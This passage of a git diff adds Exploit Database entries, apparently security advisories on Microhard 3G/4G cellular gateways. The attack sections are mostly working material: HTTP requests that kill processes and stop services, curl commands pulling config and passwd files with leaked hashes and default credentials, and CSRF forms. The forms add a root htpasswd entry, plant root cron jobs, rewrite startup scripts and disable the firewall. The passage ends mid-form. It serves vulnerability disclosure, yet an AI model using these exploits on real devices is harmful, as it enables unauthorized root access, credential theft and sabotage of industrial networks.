+any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
+It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.
+
+Desc: There is an undocumented and hidden feature that allows an authenticated attacker
+to list running processes in the operating system and send arbitrary signals to kill
+any process running in the background including starting and stopping system services.
+This impacts availability and can be triggered also by CSRF attacks that requires device
+restart and/or factory reset to rollback malicious changes.
+
+Tested on: httpd-ssl-1.0.0
+           Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2018-5481
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5481.php
+
+
+13.03.2018
+
+--
+
+
+POST /cgi-bin/webif/status-processes.sh HTTP/1.1
+Host: 192.168.1.1
+Connection: keep-alive
+Content-Length: 34
+Cache-Control: max-age=0
+Authorization: Basic YWRtaW46YWRtaW4=
+Origin: http://166.130.177.150
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Referer: http://192.168.1.1/cgi-bin/webif/status-processes.sh
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: style=null
+
+signal=SIGILL&pid=1337&kill=+Send+
+
+
+===
+
+
+Available services:
+
+# ls /etc/init.d/
+boot                 dmesgbackup          gpsgatetr            ipsecfwadd           mh_product           quagga               sysctl               vlan
+checksync            dnsmasq              gpsr                 keepalive            modbusd              rcS                  systemmode           vnstat
+coova-chilli         done                 gpsrecorderd         led                  msmscomd             salertd              telnet               watchdog
+cron                 dropbear             gred                 ledcon               msshc                sdpServer            timezone             webif
+crontab              eurd                 httpd                localmonitord        network              snmpd                twatchdog            webiffirewalllog
+custom-user-startup  firewall             ioports              logtrigger           ntpclient            soip                 umount               websockserverd
+datausemonitord      force_reboot         iperf                lte                  ntrd                 soip2                updatedd             wsClient
+defconfig            ftpd                 ipsec                lteshutdown          nxl2tpd-wan          soip2.getty          usb                  xl2tpd
+dhcp_client          gpsd                 ipsec_vpn            media_ctrl           pimd                 soipd1               vcad                 xl2tpd-wan
+
+
+Stop the HTTPd:
+
+GET http://192.168.1.1/cgi-bin/webif/system-services.sh?service=httpd&action=stop HTTP/1.1
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45036.txt b/exploits/hardware/webapps/45036.txt
new file mode 100644
index 000000000..3416b1ac4
--- /dev/null
+++ b/exploits/hardware/webapps/45036.txt
@@ -0,0 +1,144 @@
+Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Configuration Download
+
+
+Vendor: Microhard Systems Inc.
+Product web page: http://www.microhardcorp.com
+Affected version: IPn4G 1.1.0 build 1098
+                  IPn3Gb 2.2.0 build 2160
+                  IPn4Gb 1.1.6 build 1184-14
+                  IPn4Gb 1.1.0 Rev 2 build 1090-2
+                  IPn4Gb 1.1.0 Rev 2 build 1086
+                  Bullet-3G 1.2.0 Rev A build 1032
+                  VIP4Gb 1.1.6 build 1204
+                  VIP4G 1.1.6 Rev 3.0 build 1184-14
+                  VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
+                  IPn3Gii / Bullet-3G 1.2.0 build 1076
+                  IPn4Gii / Bullet-LTE 1.2.0 build 1078
+                  BulletPlus 1.3.0 build 1036
+                  Dragon-LTE 1.1.0 build 1036
+
+Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
+using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
+features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
+Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
+RS232/485/422 devices!
+
+The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
+the widespread deployment of cellular network infrastructure for critical data collection.
+From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
+The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
+provides robust and secure wireless communication of Serial, USB and Ethernet data.
+
+The all new Bullet-3G provides a compact, robust, feature packed industrial strength
+wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
+to the next level by providing features such as Ethernet with PoE, RS232 Serial port
+and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
+Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
+worth looking at!
+
+The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
+wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
+cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
+system integration and design flexibility with dual Ethernet Ports and high power
+802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
+Control Lists, the Dragon-LTE provides a solution for any cellular application!
+
+The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
+network infrastructure for critical data communications. The VIP4Gb provides simultaneous
+network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
+I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
+any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
+It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.
+
+Desc: The system backup configuration file 'IPn4G.config' in '/' directory or its respective
+name based on the model name including the similar files in '/www/cgi-bin/system.conf', '/tmp'
+and the cli.conf in '/etc/m_cli/' can be downloaded by an authenticated attacker in certain
+circumstances. This will enable the attacker to disclose sensitive information and help her
+in authentication bypass, privilege escalation and/or full system access.
+
+Tested on: httpd-ssl-1.0.0
+           Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2018-5484
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5484.php
+
+
+13.03.2018
+
+--
+
+
+/etc/m_cli/cli.conf:
+--------------------
+
+curl "http://192.168.1.1/cgi-bin/webif/download.sh?script=/cgi-bin/webif/system-editor.sh&path=/etc/m_cli&savefile=cli.conf" -H "Authorization: Basic YWRtaW46YWRtaW4=" |grep passwd
+  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
+                                 Dload  Upload   Total   Spent    Left  Speed
+100  2719  100  2719    0     0   2574      0  0:00:01  0:00:01 --:--:--  2577
+passwd admin 
+
+
+/www/IPn4G.config:
+------------------
+
+lqwrm@metalgear:~$ curl http://192.168.1.1/IPn4G.config -o IPn4G.tar.gz -H "Authorization: Basic YWRtaW46YWRtaW4="
+  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
+                                 Dload  Upload   Total   Spent    Left  Speed
+100 13156  100 13156    0     0   9510      0  0:00:01  0:00:01 --:--:--  9512
+lqwrm@metalgear:~$ tar -zxf IPn4G.tar.gz ; ls
+config.boardinfo  config.boardtype  config.date  config.name  etc  IPn4G.tar.gz  usr
+lqwrm@metalgear:~$ cat config.boardinfo config.boardtype config.date config.name 
+2012 Microhard Systems Inc.:IPn4Gb-IPn4G:v1.0.0
+Atheros AR7130 rev 2
+Thu Jul 12 12:42:42 PDT 2018
+IPn4G
+lqwrm@metalgear:~$ cat usr/lib/hardware_desc 
+modem_type="N930"
+LTE_ATCOMMAND_PORT="/dev/ttyACM0"
+LTE_DIAG_PORT=""
+LTE_GPS_PORT=""
+wificard = "0"
+lqwrm@metalgear:~$ ls etc/
+config  crontabs  dropbear  ethers  firewall.user  hosts  httpd.conf  passwd  ssl
+lqwrm@metalgear:~$ ls etc/config/
+comport         dhcp      gpsgatetr     iperf         modbusd           notes      sdpServer   twatchdog  webif_access_control
+comport2        dropbear  gpsr          ipsec         msmscomd          ntpclient  snmpd       updatedd   websockserver
+coova-chilli    ethernet  gpsrecorderd  keepalive     msshc             ntrd       snmpd.conf  vlan       wireless
+cron            eurd      gre-tunnels   localmonitor  network           pimd       system      vnstat     wsclient
+crontabs        firewall  httpd         lte           network_IPnVTn3G  ping       timezone    vpnc
+datausemonitor  gpsd      ioports       lte362        network_VIP4G     salertd    tmpstatus   webif
+lqwrm@metalgear:~$ cat etc/passwd 
+root:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/:0:0:root:/:/bin/ash
+admin:$1$0VKXa1iD$.Jw20V3iH3kx6VSLjsFZP.:0:0:admin:/:/etc/m_cli/m_cli.sh
+upgrade:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:500:500:ftpupgrade:/upgrade/upgrade:/bin/false
+at:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/:0:0:admin:/:/bin/atUI
+nobody:*:65534:65534:nobody:/var:/bin/false
+testlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.:0:0:Linux User,,,:/:/etc/testlab.sh
+testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0:0:0:Linux User,,,:/:/etc/m_cli/m_cli.sh
+testingus:$1$S9c8yiFq$P96OckXNQMhpKjFoRx1sL.:1000:1000:Linux User,,,:/home/testingus:/bin/false
+msshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh
+
+
+/www/cgi-bin/system.conf:
+-------------------------
+
+lqwrm@metalgear:~$ curl -O http://192.168.1.1/cgi-bin/system.conf -H "Authorization: Basic YWRtaW46YWRtaW4="
+lqwrm@metalgear:~$ cat system.conf |grep -irnH "password" -A2
+system.conf:236:#VPN Admin Password:
+system.conf-237-NetWork_IP_VPN_Passwd=admin
+system.conf-238-
+--
+system.conf:309:#V3 Authentication Password:
+system.conf:310:NetWork_SNMP_V3_Auth_Password=00000000
+system.conf-311-
+system.conf:312:#V3 Privacy Password:
+system.conf:313:NetWork_SNMP_V3_Privacy_Password=00000000
+
+
+Login to FTP (upgrade:admin). In /tmp/ or /tmp/upgrade/ the system.conf (gzipped) is located.
+---------------------------------------------------------------------------------------------
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45037.txt b/exploits/hardware/webapps/45037.txt
new file mode 100644
index 000000000..19a1942d4
--- /dev/null
+++ b/exploits/hardware/webapps/45037.txt
@@ -0,0 +1,139 @@
+Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Arbitrary File Attacks
+
+
+Vendor: Microhard Systems Inc.
+Product web page: http://www.microhardcorp.com
+Affected version: IPn4G 1.1.0 build 1098
+                  IPn3Gb 2.2.0 build 2160
+                  IPn4Gb 1.1.6 build 1184-14
+                  IPn4Gb 1.1.0 Rev 2 build 1090-2
+                  IPn4Gb 1.1.0 Rev 2 build 1086
+                  Bullet-3G 1.2.0 Rev A build 1032
+                  VIP4Gb 1.1.6 build 1204
+                  VIP4G 1.1.6 Rev 3.0 build 1184-14
+                  VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
+                  IPn3Gii / Bullet-3G 1.2.0 build 1076
+                  IPn4Gii / Bullet-LTE 1.2.0 build 1078
+                  BulletPlus 1.3.0 build 1036
+                  Dragon-LTE 1.1.0 build 1036
+
+Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
+using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
+features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
+Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
+RS232/485/422 devices!
+
+The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
+the widespread deployment of cellular network infrastructure for critical data collection.
+From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
+The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
+provides robust and secure wireless communication of Serial, USB and Ethernet data.
+
+The all new Bullet-3G provides a compact, robust, feature packed industrial strength
+wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
+to the next level by providing features such as Ethernet with PoE, RS232 Serial port
+and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
+Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
+worth looking at!
+
+The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
+wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
+cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
+system integration and design flexibility with dual Ethernet Ports and high power
+802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
+Control Lists, the Dragon-LTE provides a solution for any cellular application!
+
+The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
+network infrastructure for critical data communications. The VIP4Gb provides simultaneous
+network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
+I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
+any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
+It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.
+
+Desc: Due to the hidden and undocumented File Editor (Filesystem Browser) shell script
+'system-editor.sh' an attacker can leverage this issue to read, modify or delete arbitrary
+files on the system. Input passed thru the 'path' and 'savefile', 'edit' and 'delfile' GET
+and POST parameters is not properly sanitized before being used to modify files. This can
+be exploited by an authenticated attacker to read or modify arbitrary files on the affected
+system.
+
+Tested on: httpd-ssl-1.0.0
+           Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2018-5485
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5485.php
+
+
+13.03.2018
+
+--
+
+
+Download (script):
+------------------
+# curl "http://192.168.1.1/cgi-bin/webif/download.sh?script=/cgi-bin/webif/system-editor.sh&path=/etc&savefile=passwd" -H "Authorization: Basic YWRtaW46YWRtaW4="
+root:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/:0:0:root:/:/bin/ash
+admin:$1$0VKXa1iD$.Jw20V3iH3kx6VSLjsFZP.:0:0:admin:/:/etc/m_cli/m_cli.sh
+upgrade:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:500:500:ftpupgrade:/upgrade/upgrade:/bin/false
+at:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/:0:0:admin:/:/bin/atUI
+nobody:*:65534:65534:nobody:/var:/bin/false
+testlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.:0:0:Linux User,,,:/:/etc/testlab.sh
+testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0:0:0:Linux User,,,:/:/etc/m_cli/m_cli.sh
+testingus:$1$S9c8yiFq$P96OckXNQMhpKjFoRx1sL.:1000:1000:Linux User,,,:/home/testingus:/bin/false
+msshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh
+
+
+Edit (edit):
+------------
+CSRF add roOt:rewt to htpasswd:
+
+<html>
+  <body>
+    <form action="http://192.168.1.1/cgi-bin/webif/system-editor.sh" method="POST" enctype="multipart/form-data">
+      <input type="hidden" name="path" value="/etc" />
+      <input type="hidden" name="edit" value="htpasswd" />
+      <input type="hidden" name="filecontent" value="root:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/
+admin:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1
+at:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/
+testlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.
+testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0
+testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0
+roOt:$1$MJOnV/Y3$tDnMIBMy0lEQ2kDpfgTJP0" />
+      <input type="hidden" name="save" value=" Save Changes " />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+
+Delete (delfile):
+-----------------
+
+GET /cgi-bin/webif/system-editor.sh?path=/www&delfile=pwn.txt HTTP/1.1
+
+
+Or edit and remove sanitization:
+File: /usr/lib/webif/sanitize.awk
+
+// { _str=$0;
+	gsub(/ /,"",_str)
+	gsub(/\|/,"",_str)
+	gsub(/\\/,"",_str)
+	gsub(/&/,"",_str)
+	gsub(/\^/,"",_str)
+	gsub(/\$/,"",_str)
+	gsub(/'/,"",_str)
+	gsub(/"/,"",_str)
+	gsub(/`/,"",_str)
+	gsub(/\{/,"",_str)
+	gsub(/\}/,"",_str)
+	gsub(/\(/,"",_str)
+	gsub(/\)/,"",_str)
+	gsub(/;/,"",_str)
+	print _str
+}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45038.txt b/exploits/hardware/webapps/45038.txt
new file mode 100644
index 000000000..f0c747bfe
--- /dev/null
+++ b/exploits/hardware/webapps/45038.txt
@@ -0,0 +1,287 @@
+Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Remote Root Exploit
+
+
+Vendor: Microhard Systems Inc.
+Product web page: http://www.microhardcorp.com
+Affected version: IPn4G 1.1.0 build 1098
+                  IPn3Gb 2.2.0 build 2160
+                  IPn4Gb 1.1.6 build 1184-14
+                  IPn4Gb 1.1.0 Rev 2 build 1090-2
+                  IPn4Gb 1.1.0 Rev 2 build 1086
+                  Bullet-3G 1.2.0 Rev A build 1032
+                  VIP4Gb 1.1.6 build 1204
+                  VIP4G 1.1.6 Rev 3.0 build 1184-14
+                  VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
+                  IPn3Gii / Bullet-3G 1.2.0 build 1076
+                  IPn4Gii / Bullet-LTE 1.2.0 build 1078
+                  BulletPlus 1.3.0 build 1036
+                  Dragon-LTE 1.1.0 build 1036
+
+Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
+using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
+features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
+Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
+RS232/485/422 devices!
+
+The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
+the widespread deployment of cellular network infrastructure for critical data collection.
+From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
+The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
+provides robust and secure wireless communication of Serial, USB and Ethernet data.
+
+The all new Bullet-3G provides a compact, robust, feature packed industrial strength
+wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
+to the next level by providing features such as Ethernet with PoE, RS232 Serial port
+and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
+Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
+worth looking at!
+
+The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
+wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
+cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
+system integration and design flexibility with dual Ethernet Ports and high power
+802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
+Control Lists, the Dragon-LTE provides a solution for any cellular application!
+
+The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
+network infrastructure for critical data communications. The VIP4Gb provides simultaneous
+network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
+I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
+any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
+It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.
+
+Desc: The application suffers from multiple authenticated arbitrary remote code execution
+vulnerabilities with highest privileges. This is due to multiple hidden and undocumented
+features within the admin interface that allows an attacker to create crontab jobs and/or
+modify the system startup script that allows execution of arbitrary code as root user.
+
+Tested on: httpd-ssl-1.0.0
+           Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2018-5479
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5479.php
+
+
+13.03.2018
+
+--
+
+
+Crontab #1:
+-----------
+
+<html>
+  <body>
+    <form action="http://192.168.1.1/cgi-bin/webif/system-crontabs.sh" method="POST" enctype="multipart/form-data">
+      <input type="hidden" name="submit" value="1" />
+      <input type="hidden" name="sltMinutes" value="" />
+      <input type="hidden" name="sltHours" value="" />
+      <input type="hidden" name="sltDays" value="" />
+      <input type="hidden" name="sltMonths" value="" />
+      <input type="hidden" name="sltDaysOfWeek" value="" />
+      <input type="hidden" name="txthMinutes" value="" />
+      <input type="hidden" name="txthHours" value="" />
+      <input type="hidden" name="txthDays" value="" />
+      <input type="hidden" name="txthMonths" value="" />
+      <input type="hidden" name="txthDaysOfWeek" value="" />
+      <input type="hidden" name="ddEveryXminute" value="" />
+      <input type="hidden" name="ddEveryXhour" value="" />
+      <input type="hidden" name="ddEveryXday" value="" />
+      <input type="hidden" name="txtCommand" value="" />
+      <input type="hidden" name="txthCronEnabled" value="0" />
+      <input type="hidden" name="txtCrontabEntry" value="" />
+      <input type="hidden" name="MINUTES_cfg02e2c8" value="*/3" />
+      <input type="hidden" name="HOURS_cfg02e2c8" value="*" />
+      <input type="hidden" name="DAYS_cfg02e2c8" value="*" />
+      <input type="hidden" name="MONTHS_cfg02e2c8" value="*" />
+      <input type="hidden" name="WEEKDAYS_cfg02e2c8" value="*" />
+      <input type="hidden" name="COMMAND_cfg02e2c8" value="/etc/init.d/ntpclient start" />
+      <input type="hidden" name="ENABLED_cfg02e2c8" value="1" />
+      <input type="hidden" name="MINUTES_cfg04b4e9" value="*" />
+      <input type="hidden" name="HOURS_cfg04b4e9" value="*" />
+      <input type="hidden" name="DAYS_cfg04b4e9" value="*" />
+      <input type="hidden" name="MONTHS_cfg04b4e9" value="*" />
+      <input type="hidden" name="WEEKDAYS_cfg04b4e9" value="*" />
+      <input type="hidden" name="COMMAND_cfg04b4e9" value="id > /www/pwn.txt" />
+      <input type="hidden" name="ENABLED_cfg04b4e9" value="1" />
+      <input type="hidden" name="MINUTES_newCron" value="" />
+      <input type="hidden" name="HOURS_newCron" value="" />
+      <input type="hidden" name="DAYS_newCron" value="" />
+      <input type="hidden" name="MONTHS_newCron" value="" />
+      <input type="hidden" name="WEEKDAYS_newCron" value="" />
+      <input type="hidden" name="COMMAND_newCron" value="" />
+      <input type="hidden" name="ENABLED_newCron" value="" />
+      <input type="hidden" name="action" value="Save Changes" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+---
+
+curl http://192.168.1.1/pwn.txt
+uid=0(root) gid=0(root) groups=0(root)
+
+
+Start ftpd:
+-----------
+
+<html>
+  <body>
+    <form action="http://192.168.1.1/cgi-bin/webif/system-startup.sh" method="POST" enctype="multipart/form-data">
+      <input type="hidden" name="path" value="/etc/init.d" />
+      <input type="hidden" name="edit" value="custom-user-startup" />
+      <input type="hidden" name="filecontent" value="#!/bin/sh /etc/rc.common
+START=90
+# place your own startup commands here
+#
+# REMEMBER: You *MUST* place an '&' after launching programs you 
+#   that are to continue running in the background.
+#
+#   i.e. 
+#   BAD:  upnpd
+#   GOOD: upnpd &
+# 
+# Failure to do this will result in the startup process halting
+# on this file and the diagnostic light remaining on (at least
+# for WRT54G(s) models).
+#
+
+ftpd &
+
+" />
+      <input type="hidden" name="save" value=" Save Changes " />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+
+Crontab #2:
+-----------
+
+<html>
+  <body>
+    <form action="http://192.168.1.1/cgi-bin/webif/system-crontabs.sh" method="POST" enctype="multipart/form-data">
+      <input type="hidden" name="submit" value="1" />
+      <input type="hidden" name="sltMinutes" value="" />
+      <input type="hidden" name="sltHours" value="" />
+      <input type="hidden" name="sltDays" value="" />
+      <input type="hidden" name="sltMonths" value="" />
+      <input type="hidden" name="sltDaysOfWeek" value="" />
+      <input type="hidden" name="txthMinutes" value="*" />
+      <input type="hidden" name="txthHours" value="*" />
+      <input type="hidden" name="txthDays" value="*" />
+      <input type="hidden" name="txthMonths" value="*" />
+      <input type="hidden" name="txthDaysOfWeek" value="*" />
+      <input type="hidden" name="ddEveryXminute" value="" />
+      <input type="hidden" name="ddEveryXhour" value="" />
+      <input type="hidden" name="ddEveryXday" value="" />
+      <input type="hidden" name="txtCommand" value="uname -a >/www/os.txt ; ls -la /www >> /www/os.txt ; id >> /www/os.txt" />
+      <input type="hidden" name="chkCronEnabled" value="on" />
+      <input type="hidden" name="txthCronEnabled" value="1" />
+      <input type="hidden" name="txtCrontabEntry" value="* * * * * uname -a >/www/os.txt ; ls -la /www >> /www/os.txt ; id >> /www/os.txt" />
+      <input type="hidden" name="MINUTES_cfg02e2c8" value="*/3" />
+      <input type="hidden" name="HOURS_cfg02e2c8" value="*" />
+      <input type="hidden" name="DAYS_cfg02e2c8" value="*" />
+      <input type="hidden" name="MONTHS_cfg02e2c8" value="*" />
+      <input type="hidden" name="WEEKDAYS_cfg02e2c8" value="*" />
+      <input type="hidden" name="COMMAND_cfg02e2c8" value="/etc/init.d/ntpclient start" />
+      <input type="hidden" name="ENABLED_cfg02e2c8" value="1" />
+      <input type="hidden" name="MINUTES_cfg0421ec" value="*" />
+      <input type="hidden" name="HOURS_cfg0421ec" value="*" />
+      <input type="hidden" name="DAYS_cfg0421ec" value="*" />
+      <input type="hidden" name="MONTHS_cfg0421ec" value="*" />
+      <input type="hidden" name="WEEKDAYS_cfg0421ec" value="*" />
+      <input type="hidden" name="COMMAND_cfg0421ec" value="uname -a >/www/os.txt ; ls -la /www >> /www/os.txt ; id >> /www/os.txt" />
+      <input type="hidden" name="ENABLED_cfg0421ec" value="1" />
+      <input type="hidden" name="MINUTES_newCron" value="" />
+      <input type="hidden" name="HOURS_newCron" value="" />
+      <input type="hidden" name="DAYS_newCron" value="" />
+      <input type="hidden" name="MONTHS_newCron" value="" />
+      <input type="hidden" name="WEEKDAYS_newCron" value="" />
+      <input type="hidden" name="COMMAND_newCron" value="" />
+      <input type="hidden" name="ENABLED_newCron" value="" />
+      <input type="hidden" name="action" value="Save Changes" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+---
+
+curl http://192.168.1.1/os.txt
+Linux IPn4G 2.6.32.9 #1 Mon Jun 20 15:28:30 MDT 2016 mips GNU/Linux
+drwxr-xr-x    5 root     root            0 Jul  1 14:01 .
+drwxr-xr-x    7 root     root            0 Dec 31  1969 ..
+-rw-r--r--    1 root     root            4 Apr 12  2010 .version
+-rw-r--r--    1 root     root        13461 May  8 15:54 IPn4G.config
+drwxr-xr-x    3 root     root            0 Jun 20  2016 cgi-bin
+-rw-r--r--    1 root     root         2672 Apr  1  2010 colorize.js
+-rwxr-xr-x    1 root     root         3638 May 10  2010 favicon.ico
+drwxr-xr-x    2 root     root          959 Jun 20  2016 images
+-rw-r--r--    1 root     root          600 Feb 12  2013 index.html
+drwxr-xr-x    2 root     root          224 Jun 20  2016 js
+-rw-r--r--    1 root     root           68 Mar  1 14:09 os.txt
+drwxr-xr-x    2 root     root           79 Jun 20  2016 svggraph
+drwxr-xr-x    2 root     root            0 Jul  1 14:02 themes
+drwxr-xr-x    2 root     root            0 May  8 16:21 vnstat
+-rw-r--r--    1 root     root          953 Apr  1  2010 webif.js
+uid=0(root) gid=0(root) groups=0(root)
+
+
+Disable firewall:
+-----------------
+
+<html>
+  <body>
+    <form action="http://192.168.1.1/cgi-bin/webif/system-crontabs.sh" method="POST" enctype="multipart/form-data">
+      <input type="hidden" name="submit" value="1" />
+      <input type="hidden" name="sltMinutes" value="" />
+      <input type="hidden" name="sltHours" value="" />
+      <input type="hidden" name="sltDays" value="" />
+      <input type="hidden" name="sltMonths" value="" />
+      <input type="hidden" name="sltDaysOfWeek" value="" />
+      <input type="hidden" name="txthMinutes" value="*" />
+      <input type="hidden" name="txthHours" value="*" />
+      <input type="hidden" name="txthDays" value="*" />
+      <input type="hidden" name="txthMonths" value="*" />
+      <input type="hidden" name="txthDaysOfWeek" value="*" />
+      <input type="hidden" name="ddEveryXminute" value="" />
+      <input type="hidden" name="ddEveryXhour" value="" />
+      <input type="hidden" name="ddEveryXday" value="" />
+      <input type="hidden" name="txtCommand" value="/etc/init.d/firewall stop" />
+      <input type="hidden" name="chkCronEnabled" value="on" />
+      <input type="hidden" name="txthCronEnabled" value="1" />
+      <input type="hidden" name="txtCrontabEntry" value="* * * * * /etc/init.d/firewall stop" />
+      <input type="hidden" name="MINUTES_cfg02e2c8" value="*/3" />
+      <input type="hidden" name="HOURS_cfg02e2c8" value="*" />
+      <input type="hidden" name="DAYS_cfg02e2c8" value="*" />
+      <input type="hidden" name="MONTHS_cfg02e2c8" value="*" />
+      <input type="hidden" name="WEEKDAYS_cfg02e2c8" value="*" />
+      <input type="hidden" name="COMMAND_cfg02e2c8" value="/etc/init.d/ntpclient start" />
+      <input type="hidden" name="ENABLED_cfg02e2c8" value="1" />
+      <input type="hidden" name="MINUTES_cfg04f65b" value="*" />
+      <input type="hidden" name="HOURS_cfg04f65b" value="*" />
+      <input type="hidden" name="DAYS_cfg04f65b" value="*" />
+      <input type="hidden" name="MONTHS_cfg04f65b" value="*" />
+      <input type="hidden" name="WEEKDAYS_cfg04f65b" value="*" />
+      <input type="hidden" name="COMMAND_cfg04f65b" value="/etc/init.d/firewall stop" />
+      <input type="hidden" name="ENABLED_cfg04f65b" value="1" />
+      <input type="hidden" name="MINUTES_newCron" value="" />
